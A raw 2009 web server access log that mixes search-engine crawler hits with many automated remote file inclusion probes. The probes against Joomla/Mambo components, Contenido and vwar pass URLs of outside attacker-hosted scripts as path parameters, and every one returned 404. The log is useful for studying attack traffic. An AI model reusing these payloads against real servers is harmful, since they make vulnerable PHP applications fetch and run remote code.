66.249.71.54 - - [12/Jun/2009:02:28:30 -0400] "GET /images/_notes/home_shopping_over.gif.mno HTTP/1.1" 200 251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:28:39 -0400] "GET /images/_notes/nav_store_cart_grn.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:28:50 -0400] "GET /images/_notes/nav_store_fav_blue.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:28:59 -0400] "GET /images/_notes/nav_home_temp_over.jpg.mno HTTP/1.1" 200 251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
211.189.18.73 - - [12/Jun/2009:02:29:01 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:02:29:01 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:29:04 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:29:05 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:29:06 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:29:08 -0400] "GET /images/_notes/download_credit_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
193.28.145.13 - - [12/Jun/2009:02:29:09 -0400] "GET /logs/access_log.Q109052700/index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.806"
66.128.53.115 - - [12/Jun/2009:02:29:11 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:29:12 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:29:12 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
211.189.18.73 - - [12/Jun/2009:02:29:19 -0400] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.189.18.73 - - [12/Jun/2009:02:29:19 -0400] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://harvestusa.org///administrator//components/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:29:19 -0400] "GET /images/_notes/banner_connect_off.gif.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:29:20 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:29:26 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:29:26 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:29:26 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:29:26 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:29:28 -0400] "GET /images/_notes/download_EZ_PRP_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:29:38 -0400] "GET /images/_notes/nav_store_hist_grn.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:29:39 -0400] "GET /logs/access_log.Q109060800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
217.125.38.117 - - [12/Jun/2009:02:29:43 -0400] "GET /logs/access_log.Q109051600//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:29:47 -0400] "GET /images/_notes/nav04_contact_over.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:29:53 -0400] "GET /logs/access_log.Q109052500//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:29:53 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
121.165.73.157 - - [12/Jun/2009:02:29:55 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:02:29:55 -0400] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
121.165.73.157 - - [12/Jun/2009:02:29:55 -0400] "GET /logs/access_log.Q109052900/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://cahaya123.wen.ru/id1.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:29:55 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:29:57 -0400] "GET /images/_notes/store_anim_r2_c1_f6.gif.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:29:59 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:30:00 -0400] "GET /logs/access_log.Q109052900//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:30:03 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:30:06 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:30:07 -0400] "GET /images/_notes/store_anim_r2_c1_f4.gif.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.170 - - [12/Jun/2009:02:28:37 -0400] "GET /logs/access_log.Q109061000 HTTP/1.0" 200 4425432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.128.53.115 - - [12/Jun/2009:02:30:11 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:30:11 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
116.125.126.72 - - [12/Jun/2009:02:30:14 -0400] "GET /logs/access_log.Q109053100%20%20/index.php?arquivo=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
116.125.126.72 - - [12/Jun/2009:02:30:14 -0400] "GET /logs/error_log.Q109051400%20%20/index.php?arquivo=http://www.dentyx.com/shop/upload/category/1.swf?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jun/2009:02:30:14 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jun/2009:02:30:14 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
201.232.54.48 - - [12/Jun/2009:02:30:14 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:30:15 -0400] "GET /logs/access_log.Q109052600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:30:16 -0400] "GET /images/_notes/home_welcome_bkgrd3.gif.mno HTTP/1.1" 200 249 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:30:25 -0400] "GET /images/_notes/nav_store_cart_blue.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:30:36 -0400] "GET /images/_notes/download_RCF_RCT_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.170 - - [12/Jun/2009:02:29:07 -0400] "GET /logs/access_log.Q109060900 HTTP/1.0" 200 4908335 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:30:45 -0400] "GET /images/_notes/download_autogft_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.170 - - [12/Jun/2009:02:30:09 -0400] "GET /logs/access_log.Q109061100 HTTP/1.0" 200 4824283 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:30:54 -0400] "GET /images/_notes/download_check_back.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [12/Jun/2009:02:30:57 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:30:57 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:30:57 -0400] "GET //index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:31:04 -0400] "GET /images/_notes/download_RCF_RCT_lg.jpg.mno HTTP/1.1" 200 258 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [12/Jun/2009:02:31:09 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:31:11 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:31:11 -0400] "GET //index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.128.135.52 - - [12/Jun/2009:02:31:12 -0400] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.805"
66.249.71.54 - - [12/Jun/2009:02:31:14 -0400] "GET /images/_notes/nav_store_hist_blue.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [12/Jun/2009:02:31:14 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:31:16 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:31:17 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:31:17 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
193.28.145.13 - - [12/Jun/2009:02:31:18 -0400] "GET /index.php?option=com_registration&Itemid=&mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.806"
66.249.71.54 - - [12/Jun/2009:02:31:23 -0400] "GET /images/_notes/nav_store_expr_orng.jpg.mno HTTP/1.1" 200 246 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [12/Jun/2009:02:31:25 -0400] "GET //index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
209.59.12.99 - - [12/Jun/2009:02:31:26 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.189.2.38 - - [12/Jun/2009:02:31:30 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:31:32 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:31:33 -0400] "GET /images/_notes/nav_store_index_off.jpg.mno HTTP/1.1" 200 254 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [12/Jun/2009:02:31:34 -0400] "GET /logs/access_log.Q109052300//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:31:35 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:31:35 -0400] "GET //index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:31:36 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:31:37 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:02:31:38 -0400] "GET /logs/access_log.Q109050300//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
66.128.53.115 - - [12/Jun/2009:02:31:38 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:31:38 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:31:39 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:31:43 -0400] "GET /images/_notes/home_welcome_bkgrd4.jpg.mno HTTP/1.1" 200 251 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:31:53 -0400] "GET /images/_notes/nav_store_hist_orng.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.122.72.93 - - [12/Jun/2009:02:31:54 -0400] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.122.72.93 - - [12/Jun/2009:02:31:54 -0400] "GET //components/com_sitemap/sitemap.php?mosConfig_admin_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
64.70.103.245 - - [12/Jun/2009:02:31:58 -0400] "GET /logs/access_log.Q109052400//?_SERVER[DOCUMENT_ROOT]=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.122.72.93 - - [12/Jun/2009:02:31:59 -0400] "GET /logs/access_log.Q109031800%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://largeface.com/gnuboard4/style/sid.txt????? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:32:02 -0400] "GET /images/_notes/store_anim_r2_c1_f5.gif.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [12/Jun/2009:02:32:04 -0400] "GET /logs/access_log.Q109051100//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.54 - - [12/Jun/2009:02:32:11 -0400] "GET /images/_notes/nav_store_ckout_grn.jpg.mno HTTP/1.1" 200 247 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:32:15 -0400] "GET /logs/access_log.Q109052200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:32:15 -0400] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.814"
66.128.53.115 - - [12/Jun/2009:02:32:15 -0400] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:32:22 -0400] "GET /images/_notes/nav04_download_over.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.170 - - [12/Jun/2009:02:32:02 -0400] "GET /logs/access_log.Q109060400 HTTP/1.0" 200 4467320 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:32:31 -0400] "GET /images/_notes/download_autogft_sm.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:32:41 -0400] "GET /images/_notes/home_welcome_bkgrd_.gif.mno HTTP/1.1" 200 249 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:32:51 -0400] "GET /images/_notes/nav04_products_over.jpg.mno HTTP/1.1" 200 259 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:32:57 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:33:00 -0400] "GET /images/_notes/download_osteotomes.jpg.mno HTTP/1.1" 200 260 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.71.54 - - [12/Jun/2009:02:33:10 -0400] "GET /images/_notes/headline_summersale.jpg.mno HTTP/1.1" 200 252 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.128.53.115 - - [12/Jun/2009:02:33:14 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.nettranscabo.com.br/txt/idd.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.814"
66.249.71.54 - - [12/Jun/2009:02:33:19 -0400] "GET /images/_notes/banner_connect_over.jpg.mno HTTP/1.1" 200 255 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.6.22.170 - - [12/Jun/2009:02:33:07 -0400] "GET /logs/access_log.Q109060500 HTTP/1.0" 200 3718537 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
66.249.71.54 - - [12/Jun/2009:02:33:29 -0400] "GET /images/_notes/store_anim_r2_c1_f2.gif.mno HTTP/1.1" 200 250 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
213.189.2.38 - - [12/Jun/2009:02:33:30 -0400] "GET //index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:33:30 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
213.189.2.38 - - [12/Jun/2009:02:33:30 -0400] "GET /logs/access_log.Q109051100%20%20//index.php?option=com_custompages&cpage=http://bandenpaleis.nl/bp/modules/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
62.128.135.52 - - [12/Jun/2009:02:33:34 -0400] "GET /logs/access_log.Q109050900//index.php/index.php?mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
62.128.135.52 - - [12/Jun/2009:02:33:34 -0400] "GET //index.php/index.php?mosConfig_absolute_path=http://sakhalin-inform.ru/images/rss.txt?? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
